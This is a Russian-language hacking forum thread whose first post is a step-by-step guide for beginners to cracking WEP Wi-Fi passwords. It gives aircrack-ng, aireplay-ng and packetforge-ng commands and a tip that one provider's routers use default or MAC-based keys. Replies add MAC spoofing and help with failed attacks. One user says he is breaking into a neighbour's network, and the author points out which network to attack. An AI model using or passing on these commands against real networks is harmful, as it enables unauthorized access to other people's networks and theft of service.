9 шагов или BT5, взлом wep для начинающих!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by теща, 2 Nov 2009.

  1. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
    используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
    пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
    я уверен что там есть ответы.


    1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
    еще бывают ath0 mon0 итп.
    2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
    определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
    просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
    останавливаем все окна командой Ctrl+c и делаем такое
    airmon-ng stop mon0
    airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
    airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
    airmon-ng start wlan0 9 - пример.


    3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
    В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
    а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

    4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
    в етом окне будет мак ломаемой сети. И будут собираться пакеты.

    Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
    англ текст и вот такое вот :)
    5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
    2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0

    6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
    жмем y
    7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
    жмем y


    Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
    8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
    2. aireplay-ng -2 -r arp-request wlan0
    Команда 8 набираем в одном окне
    Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
    до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
    если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
    сохраняються на ваш рабочий стол..
    9) aircrack-ng -b ломаемый мак capture*.cap

    Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
    собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

    Я думаю у вас получиться :cool:...
    БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.

    Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке
    .....................................................................................
    Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :) ...
    видео взлом WPA ВЗЛОМ WPA2<<<<<<<<<ВКЛ

    Статистика скорости перебора пароля :
     
    #1 теща, 2 Nov 2009
    Last edited: 7 Jan 2012
    antibiotic, Keltos, Elvis000 and 6 others like this.
  2. sergey_allll

    sergey_allll New Member

    Joined:
    7 Feb 2009
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    bt4 предфинальная версия:

    Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down
    шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0
    шаг 3 подымаем wi-fi карту: ifconfig wlan0 up
    шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0"
    шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0
    шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано.
     
    Aleksandr644, LuCiFeR and теща like this.
  3. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    фак писал что б пасажири которые не умеют летать на линукс не писали в пм а сразу ломали сеть . зачем флудить в теме ?
     
    #3 теща, 3 Nov 2009
    Last edited: 13 Feb 2012
  4. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    Я тебя засужу за обман.. на моем Зюкселе 56К не скачалось за пол часа ;) (стеб)

    этой статьей ты только сильнее превлек внимание к своему ПМ, да и те кто "не умеют летать на линукс" даже с этой статейкой не полетят.

    Это не флуд а открытое мнение о том что ты, как таковое выложил перевод офф. доков (просто сжато и на родимом, могучем. за что и маленький респектик тебе).

    извини конечно но твоя статья никак не может быть руководством для начинающих пользоваться ОС Linux и д.р. Unix подобных.

    Спасибо за внимание, оформление статьи не сахар =(
     
    1 person likes this.
  5. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    POS_troi


    я видео выложу тады в ПМ писать не будут :cool:
     
    #5 теща, 3 Nov 2009
    Last edited: 7 Jan 2012
  6. LuCiFeR

    LuCiFeR New Member

    Joined:
    21 Jul 2005
    Messages:
    24
    Likes Received:
    4
    Reputations:
    11
    На пятом пункте постоянно:

    Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    ------------
    все сломать эту точку уже не удастся, верно?
     
  7. sergey_allll

    sergey_allll New Member

    Joined:
    7 Feb 2009
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    LuCiFeR если это wep то получить пороль можно.
    У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент.
     
  8. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден
     
  9. LuCiFeR

    LuCiFeR New Member

    Joined:
    21 Jul 2005
    Messages:
    24
    Likes Received:
    4
    Reputations:
    11
    У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
    Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае)))

    [​IMG]

    Кто нить тут видит приличную точку? )))
     
    1 person likes this.
  10. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    LuCiFeR

    самая первая самая нижняя и кствати одна открытая )
     
  11. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    Ищи где шифрования WEP, и снифай ломай))
    а WPA брутить надо=)
     
    2 people like this.
  12. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    я то полетел -)....
     
  13. LuCiFeR

    LuCiFeR New Member

    Joined:
    21 Jul 2005
    Messages:
    24
    Likes Received:
    4
    Reputations:
    11
    6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
    жмем y

    вот так правильней по моему ><


    -----------

    не понимаю я, пробовал уже 4 wep защищенных точки, ни разу не удалось... хотя сигнал больше половины... может у меня карточка не подходящая?
     
    #13 LuCiFeR, 5 Nov 2009
    Last edited: 5 Nov 2009
    1 person likes this.
  14. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    ага .. очепятка . исправил!
    если карта не подходит то просто собирай пакеты , да оно б писало что вас чипсет не подходит на англ... у тя не сентрино чипсет случйно если нет то не беспокойся )
     
    #14 теща, 5 Nov 2009
    Last edited: 5 Nov 2009
  15. LuCiFeR

    LuCiFeR New Member

    Joined:
    21 Jul 2005
    Messages:
    24
    Likes Received:
    4
    Reputations:
    11
    atheros
     
  16. Robert007

    Robert007 New Member

    Joined:
    5 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Застрял на третем пункте
    ввожу sudo macchanger wlan0
    Current MAC: 00:11:11:11:11:11 (Intel Corporation)
    ERROR: Can't change MAC: interface up or not permission: Device or resource busy

    с чем это связано?
     
  17. LuCiFeR

    LuCiFeR New Member

    Joined:
    21 Jul 2005
    Messages:
    24
    Likes Received:
    4
    Reputations:
    11
    Robert007, ifconfig wlan0 down
    Читай код ошибки, устройство занято, следовательно его нужны остановить...

    Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc
     
    1 person likes this.
  18. Robert007

    Robert007 New Member

    Joined:
    5 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Всё чделал как написано
    Пункт 4,6,7 без проблем
    Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)

    оно само законить читать или нужно выключить в ручную?
    на рабочем столе никаких файлов не появилось,они появяться потом?
    в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?
     
  19. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    ни с чем просто мак адрес копируй и делай все дальше .... -)
     
  20. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000
     
Loading...